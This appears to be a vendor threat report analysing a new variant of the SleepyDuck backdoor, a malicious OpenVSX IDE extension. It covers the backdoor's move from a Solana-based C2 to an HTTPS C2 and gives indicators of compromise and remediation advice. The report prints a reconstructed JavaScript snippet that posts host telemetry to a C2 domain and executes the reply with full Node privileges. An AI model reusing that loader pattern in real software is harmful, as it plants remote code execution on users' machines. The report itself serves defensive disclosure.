SleepyDuck Evolution
Summary
SleepyDuck is a minimal backdoor that collects system information and communicates with Command-and-Control (C2) server via HTTPS. The sample executes the data received from the C2 in memory.
Background
This is not the first time the malware has been discovered in the OpenVSX marketplace. The previous iteration was an equally compact backdoor that demonstrates the same supply-chain attack vector explored in the SleepyDuck campaign. Both variations of this backdoor illustrate how small IDE extensions can be weaponized to establish remote command execution channels under the guise of developer tooling.
In the first iteration, SleepyDuck used a Solana-based command and control architecture. When executed, the backdoor initialized a vm instance and pulled the latest configuration data from an on-chain smart contract via a Solana RPC. After this, the malware entered a continuous polling loop for tasking.
The C2 server smart contract for the early variant was sleepyduck[.]xyz and the backdoor polled it every 30 seconds. The smart contract allowed operators to remotely update polling intervals and issue commands to all infected endpoints without direct network contact.
New Variant
The new SleepyDuck malware drops the blockchain persistence model in favor of a more traditional HTTPS-based C2 design. It retains the original distinctive ASCII duck header and compact loader structure but introduces several noteworthy changes.
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⡶⠿⠿⠷⣶⣄⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡿⠁⠀⠀⢀⣀⡀⠙⣷⡀⠀⠀⠀
⠀⠀⠀⡀⠀⠀⠀⠀⠀⢠⣿⠁⠀⠀⠀⠘⠿⠃⠀⢸⣿⣿⣿⣿
⠀⣠⡿⠛⢷⣦⡀⠀⠀⠈⣿⡄⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⠟
⢰⡿⠁⠀⠀⠙⢿⣦⣤⣤⣼⣿⣄⠀⠀⠀⠀⠀⢴⡟⠛⠋⠁⠀
⣿⠇⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠁⠀⠀⠀⠀⠀⠈⣿⡀⠀⠀⠀
⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⡇⠀⠀⠀
⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡇⠀⠀⠀
⠸⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⡿⠀⠀⠀⠀
⠀⠹⣷⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣰⡿⠁⠀⠀⠀⠀
⠀⠀⠀⠉⠙⠛⠿⠶⣶⣶⣶⣶⣶⠶⠿⠟⠛⠉⠀⠀⠀
The variant continues to collect host telemetry and generates a unique machine identifier derived from a SHA-256 hash of that data. Unlike the Ethereum variant, the new sample posts the collected information to hxxps://function.undefined21[.]com/p. Another notable difference in this variant is the account used to publish the malware was named after security researcher John Tuckner rather than the previously observed usage of the developer Juan Blanco’s name.
Description
When run, the malware collects system information including the hostname, username, platform, and the MAC address. it creates a system identifier using the first 16 characters of the SHA256 hash of the hostname, MAC, and platform values. The malware proceeds to communicate with a C2 server via HTTPS. The server is obfuscated in the original code and deobfuscates to hxxps://function.undefined21[.]com. The malware issues a POST request to the path /p with the collected telemetry in JSON format. The malware treats the response from the C2 server as executable JavaScript and executes it inside a vm context with a context that includes require, process, Buffer, network and filesystem modules. This indicates the code from the C2 server can perform the same privileged operations as the backdoor.
const options = {
method: 'POST',
headers: { 'Content-Type': 'application/json' }
};
const req = https.request("https://"+DOMAIN+'/p', options, (res) => {
let responseBody = '';
res.on('data', (chunk) => responseBody += chunk);
res.on('end', () => {
try {
const context = vm.createContext(
{ console, require, process, Buffer, https, apple, fs, os, path }
);
vm.runInContext(responseBody, context);
} catch (e) {
}
});
});
req.write(JSON.stringify(SYSTEM_INFO));
req.end();
The code above is an analyst interpretation of a snippet of JavaScript from the malware, highlighting the main capabilities where the new variant of SleepyDuck issues an HTTPS request to the C2 server and streams the response into a buffer. The malware creates a vm sandbox with the previously mentioned host objects and immediately executes the fetched text inside that context with vm.runInContext.
The C2 Server
The C2 server is flagged by one security vendor on VirusTotal as being malicious. Three paths have been uncovered within the remote server. The path /p is used by the malware to send POST requests containing information about the infected systrem. When visiting the malicious website, the two remaining paths reveal themselves to be /login and /dashboard. Below is what a user would see when visitng the site.
The login screen appears to only accept a password. The paths obtained from the network traffic suggests this website is the dashboard used to track and issue commands to execute on the infected systems. This infrastructure can be leveraged to deliver a fully capable Malware-as-a-Service (MaaS) platform which has been a notable trend on other fronts.
Host-Based Indicators
File Hashes
-
Extension
MD5:75e2e03e47902bf7f43cecb7ab2175ea
SHA256:afccbf2f973c94a36a726ed8b53106b1b491d25a3e55aa7b6092742989cab7ae
Name:Nomic.hardhat-0.8.26.vsix -
Malicious JavaScript
MD5:d4988bee794258a51daac3b7cf1fc5d6
SHA256:500d250caa3bde6fbcbe627aff9e4a1377220358852b05e54378c8aa8f9f3591
Name:webpack.js
Network-Based Indicators
- URL:
hxxps://function.undefined21[.]com- Note: Sends
POSTrequest to the path/p
- Note: Sends
Remediation
We recommend add alerts for sudden changes to installed extensions from OpenVSX, including new outbound TLS endpoints or unusual process behavior immediately after extension updates. Furthermore, ensure your endpoint detection and response (EDR) systems are not only updated with the indicators identified in this report, but also tuned to flag suspicious behaviors common to malicious extensions such as unusual network traffic, unauthorized credential access, or persistence mechanisms. Regular validation of detection rules and proactive threat hunting can help catch variants that evolve beyond known indicators.
Defense shouldn’t stop there — the dev-guard extension, built and maintained by the Yeeth Security team, adds a crucial layer of protection for VS Code and Cursor AI users. By continuously monitoring new campaigns and pushing live updates, dev-guard helps shut down these threats before they can spread across the developer community.